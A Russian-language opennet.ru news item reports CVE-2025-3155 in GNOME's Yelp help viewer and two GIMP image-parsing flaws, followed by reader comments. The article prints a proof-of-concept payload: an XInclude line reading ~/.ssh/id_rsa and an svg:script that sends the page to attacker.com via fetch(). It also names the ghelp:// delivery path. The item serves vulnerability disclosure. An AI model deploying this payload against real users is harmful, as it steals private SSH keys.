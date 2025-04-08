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Уязвимости в GNOME Help и GIMP, позволяющие выполнить код при открытии файлов

08.04.2025 10:07

В просмотрщике Yelp, применяемом по умолчанию в GNOME для работы со справочными руководствами (GNOME Help), выявлена уязвимость (CVE-2025-3155), позволяющая выполнить произвольный JavaScript-код при открытии специально оформленных page-файлов. Выполнение подобных скриптов даёт возможность отправить файлы пользователя на сервер атакующего. Проследить за устранением уязвимости в дистрибутивах можно на следующих страницах: Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD.

В GNOME для открытия файлов со справочными руководствами регистрируется URI "ghelp://", обрабатываемый через вызов Yelp. Для атаки злоумышленнику необходимо добиться загрузки своего файла index.page на систему пользователя. Например, можно обманом вынудить загрузить файл через браузер, кликнув на ссылку на сайте атакующего. После того как файл загружен атакующий может инициировать открытие этого документа, перенаправив в браузере переход со своей страницы на URL ghelp://" с путём к каталогу, в который загружен файл. Например, "ghelp:///proc/self/cwd/Downloads", где путь "/proc/self/cwd" ассоциирован с рабочим каталогом текущего процесса (при запуске yelp это будет домашний каталог пользователя).

Уязвимость вызвана тем, что в page-файлах используется формат Mallard, основанный на XML. В данном формате имеется возможность вставки в документ содержимого других файлов, используя механизм XInclude. Для отрисовки page-файлов программа Yelp преобразует их из XML в HTML при помощи XSLT (yelp-xsl), после чего отображает используя движок WebKitGtk. Идея в том, чтобы добиться подстановки JavaScript в результирующий HTML-файл и использовать данный JavaScript для отправки на сервере содержимого, подставленного через XInclude.

Для подстановки JavaScript использовано то, что XSLT копирует некоторые элементы в HTML без разбора, например, целиком переносит элемент <svg> и всё вложенное содержимое. Таким образом, для передачи на внешний сервер файла "~/.ssh/id_rsa" достаточно подставить его в page-документ директивой "include": 


   <include parse="text" xmlns="http://www.w3.org/2001/XInclude" href="/proc/self/cwd/.ssh/id_rsa"/>

После чего добавить через элемент <svg:script...> вызов JavaScript с кодом для отправки POST-запроса на внешний сервер, используя функцию fetch(): 


    <svg:svg xmlns:svg="http://www.w3.org/2000/svg">
      <svg:script>onload=_=>fetch("http://attacker.com/",{method:"POST",body:document.body.outerHTML,mode:"no-cors"})</svg:script>
    </svg:svg>

Дополнительно можно отметить две уязвимости (CVE-2025-2761, CVE-2025-2760) в графическом редакторе GIMP, приводящие к выполнению кода атакующего при открытии пользователем специально подготовленных изображений в форматах XWD и FLI. Обе уязвимости вызваны отсутствием должной проверки размера данных, копируемых в буфер в процессе разбора содержимого файлов. Уязвимости устранены в версии GIMP 3.0.0.

  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Уязвимость в библиотеке libgsf, затрагивающая GNOME
  3. OpenNews: Уязвимость в libcue, приводящая к выполнению кода при загрузке файлов в GNOME
  4. OpenNews: Уязвимость в gnome-exe-thumbnailer, позволяющая выполнить код при просмотре каталога с MSI-файлом
  5. OpenNews: Уязвимость в GNOME Evince, позволяющая выполнить код при построении миниатюр
  6. OpenNews: Уязвимость, позволяющая обойти парольную защиту хранителя экрана GNOME
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63035-gnome
Ключевые слова: gnome, gimp, yelp
При перепечатке указание ссылки на opennet.ru обязательно


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  • 1.1, Аноним (-), 10:35, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +4 +/
    > Обе уязвимости вызваны отсутствием должной проверки размера данных,
    > копируемого в буфер в процессе разбора содержимого файлов.

    Да как же так ( ╯°□°)╯ ┻━━┻
    Хотя... это гимп, может ему и простительно.

    ЗЫ: уровень костылизации процедуры показа обычного хелпа впечатляет... хотя можно еще к контейнер завернуть.

     
     
  • 2.3, Аноним (3), 10:38, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    Эти люди ржали над RTF и CHM.
     
     
  • 3.4, Соль земли (?), 10:40, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Что-то мне подсказывает, что в RTF забыли букву M.
     
     
  • 4.5, ryoken (ok), 10:47, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +4 +/
    неа
    RTF: Rich Text Format.
     
     
  • 5.22, ZloySergant (ok), 11:58, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    >неа
    >RTF: Rich Text Format.

    RTFM: Read that f*ng manual.

     
  • 3.7, 1 (??), 11:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Да тут скорее дело в том, что XML только выглядит, как язык разметки. А на самом деле вполне себе язык программирования (с помощью XSLT). А кто ж проверяет, что там XSLT наделал.

    Странно, что нет уязвимостей с подделкой XSLT.

     
     
  • 4.12, n00by (ok), 11:43, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Высмеиваемое "умею программировать на HTML" внезапно играет новыми красками.
     
     
  • 5.43, Аноним (43), 13:27, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > умею программировать на HTML

    Все программируют на Rust,
    А он нетакусик на С++.
    А он нетакусик на HTML, python.
    Определение нетакусика меняется на противоположное.

     
     
  • 6.48, Аноним (48), 13:47, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    некокусик.
     
  • 4.35, Сталин (?), 13:01, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    XML не язык программирования. Так же как не язык программирования plain text, например. А вот XSLT — язык программирования, просто он основан на XML, так же как Си основан на plain text.
     
     
  • 5.38, Аноним (-), 13:10, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > XML не язык программирования. Так же как не язык программирования plain text,
    > например. А вот XSLT — язык программирования, просто он основан на
    > XML, так же как Си основан на plain text.

    XSLT часть спеков XML, и многие даже не подозревают о такой подставе.

     
  • 3.36, Аноним (-), 13:01, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Эти люди ржали над RTF и CHM.

    Через хелпарь я как-то и винду поимел. Приблуда под админом - позволяля позырить хелп юзеру. Ну я и эскалировал, запустив из диалога открытия cmd.exe. Администый уже. Спасибо за продвинутые диалоги открытия файлов, виндус. Что, не ожидали такой подставы?!

     
     
  • 4.47, User (??), 13:44, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Оооо, хааа-ааа-ааакир! А расскажи еще, как ты винду переустанавливал и активаторы искал - нам очень, ОЧЕНЬ интересно как это в форчун-500 делают!
     
  • 2.8, Аноним (43), 11:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    > позволяющая выполнить произвольный JavaScript-код при открытии специально оформленных page-файлов

    Под Linux нет вирусов.
    Есть всяческие doorways, Bloatware.

     
     
  • 3.11, n00by (ok), 11:37, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Вирусов почти нигде нет. Вирус -- по определению -- внедряет свой код (инфицирует) в полезный исполняемый файл. Это достаточно сложно реализовать даже в самом примитивном варианте. Подавляющее большинство местных, считающих себя системными программистами (разработчиками операционных систем), не справятся, тогда как это базовые знания и умения (формат исполняемых файлов, поиск машинных инструкций в документации).
     
     
  • 4.13, Аноним (13), 11:48, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Зато есть ПО собранное от Васи в репозитории, которое делает непонятно что)
     
     
  • 5.20, n00by (ok), 11:54, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Да всё понятно оно было еще два века назад, оказывается. Сферы разума Белосельского-Белозёрского с промежутками, где всякие активисты и предводители сект. Эффект Даннинга-Крюгера лишь тень.
     
  • 5.27, Аноним (27), 12:33, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Не использовать никаие репозитории, кроме официального вашего дистра?
    А, нет пакета нужной софтинки... Ну так самому собрать пакетик.
     
     
  • 6.44, Аноним (43), 13:28, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > Не использовать никаие репозитории, кроме официального вашего дистра.

    Использовать только Default Wallpapers.

     
  • 4.16, Аноним (16), 11:50, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > Подавляющее большинство местных

    это все кроме вас

     
     
  • 5.24, n00by (ok), 12:03, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Всем такое и ни к чему знать. Но наверняка есть, кто справится, потенциально, процентов 5-10.

    Это должно быть понятно из формулы "Hackers, Programmers & Rebels UNITE!"

    Какой смысл в последних? Они ничего не создают, не являются обычными пользователями, способными выдать дельные требования. Понижают общий уровень, отнимают время, мешают расти и перерасти владельца франшизы.

     
     
  • 6.25, Аноним (25), 12:28, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Мир, труд, май - говорили они, а щас - Война, каторга (пашите в три смены), а май давно уже стал февралем.

    пс: всякого кто кричит "UNITE!" надо "юнайтить с гамном".

     
     
  • 7.39, шёл мимо прифигел от прочитанного (?), 13:10, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    А это когда те, кто за братство трудящихся были (мир, труд, май т.е. провозглашали) войну, каторгу и февраль учредили? Вы откуда то из параллельной вселенной пишите? Или из палаты для буйных?

    А то те, кто за мир, труд и май были, они ещё восьмичасовой рабочий день протащили, соц. обеспечение, декреты и прочие оплачиваемые отпуска... Ну и да, за мир во всём мире были, потому что капитал гонит в окопы трудящихся. А нафига оно трудящимся?

    А вот неоплачиваемые переработки, произвол работодателя и иже с ним, это из другого лагеря. Из лагеря атлантов всяких, плечи расправляющих. Не путайте.

     
  • 6.40, Аноним (40), 13:12, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > Какой смысл в последних? Они ничего не создают, не являются обычными пользователями,
    > способными выдать дельные требования. Понижают общий уровень, отнимают время, мешают расти
    > и перерасти владельца франшизы.

    Ну, это, ты можешь затыкать амбразуру и лично своей тушкой. А как по мне так прикольнее туды Rebel'а отправить. Это ведь его специализация :)

     
  • 4.26, Аноним (27), 12:29, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ещё до интернетов, в компутерных журналах 1990-х подробно разбирался формат исполняемого файла DOS MZ, куда в него прилепить свой код, куда прописать передачу управления на него, как потом передать управление легитимному коду. Так что, ничего там ракетнонаучного.
    Аналогично можно было бы проделать подобное и с файлом ELF, если, конечно, удастся получить право записи в него.
     
     
  • 5.45, Аноним (43), 13:30, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    > Ещё до интернетов, в компутерных журналах 1990-х подробно разбирался формат исполняемого файла DOS MZ, куда

    А еще ведь в книжке Наука и Техника СССР 1917 г.

     
  • 4.28, Аноним (43), 12:34, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    > считающих себя системными программистами (разработчиками операционных систем), не справятся, тогда как это базовые знания и умения

    Хаккер может взломать твой компьютер через подсветку клавиатуры.

     
  • 2.18, Жироватт (ok), 11:52, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Ну, манов и размеченных groff'ом файлов справки вам мало - вам, Простым(тм) Пользователям(с) нужен полностью интерактивный документ с раздвигающимися списочками, красиво масштабирующимися картинками и прочим веб2.0 (как ещё к справке не прикрутили "поделиться в твиттере/фейсбуке" - ума не приложу).

    Вот вам готовый аштэмээль, со всеми его плюсами и минусами. Что-то не так?

     
     
  • 3.30, Аноним (30), 12:41, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Дядь, документация к Гному и Гимпу точно не того масштаба чтобы запихать ее в ман, дабы он сплошной серой простыней вываливался в черную консоль.
     

  • 1.2, Аноним (-), 10:35, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > Выполнение подобных скриптов даёт возможность отправить файлы пользователя на сервер атакующего.

    Повторили вулн файрфокса позволявший у пользователей тырить ключи ssh и проч...

     
  • 1.6, Аноним (6), 11:05, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Возможность исполнять JavaScript-код в хелп файле ЗАЧЕМ!?
     
     
  • 2.9, 1 (??), 11:08, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Красиво же ! Опять же help - это html. А движок показа html выполняет и JS.
     
     
  • 3.46, Соль земли (?), 13:43, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +/
    Необязательно. За JS отвечает отдельный движок.
     

  • 1.14, Жироватт (ok), 11:48, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >  Для атаки злоумышленнику необходимо добиться загрузки своего файла index.page на систему пользователя а потом из браузера нужно получить каталог загрузки и только потом инициировать переход со своей страницы на URL ghelp://" с путём к каталогу, в который загружен файл

    1) Почему это уязвимость подсистемы справки гнома, а не браузера, который отдаёт стороннему скрипту инфо о каталоге загрузки файла, достаточную, чтобы сформировать запрос на локальный путь?
    2) Почему вообще браузер сообщает что-то пользовательскому скрипту, кроме сингалов "файл загружен успешно"/"загрузка прервана, повтори"?

    Новость ради новости, уязвимость уровня "дайте какеру доступ до вашего ПК - он скачает ваши фоточки"

     
     
  • 2.19, Аноним (16), 11:52, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Новость ради новости, уязвимость уровня "дайте какеру доступ

    и пароль рута.

     

  • 1.17, anonymous (??), 11:51, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Мне кажется, давно уже назрела необходимость создания безопасного подмножества html, ТОЛЬКО для разметки текста. Без скриптов, без абсолютного позиционирования и фреймов. Чтобы можно было вставить как есть в любой пост на том же opennet к примеру, и чтобы у читателей такого html-like комментария ни в каком случае не утекли данные или не порвалась разметка всей страницы.

    Подобное html-подмножество много где интересно применить будет. В том Jupyter к примеру.

     
     
  • 2.21, Жироватт (ok), 11:54, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    gopher + gemini, все давно уже придумано до вас.
     
  • 2.41, Аноним (40), 13:13, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    > Мне кажется, давно уже назрела необходимость создания безопасного подмножества html, ТОЛЬКО
    > для разметки текста. Без скриптов,

    Ну так рендери только HTML - и отключи JS. Правда, половина сайтов сломается нахрен. Но опеннет работать - будет.

     
  • 2.42, Аноним (3), 13:20, 08/04/2025 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    Простите, но есть Markdown.
     

  • 1.23, Аноним (23), 12:01, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Не совсем понял. По итогу что в справке, что в браузере можно выполнить опасный скрипт. Но почему скрипт из вебкита справки может отправить файл с ключами, а браузер не может? Кажется в этом проблема, а не в парсинге XML.
     

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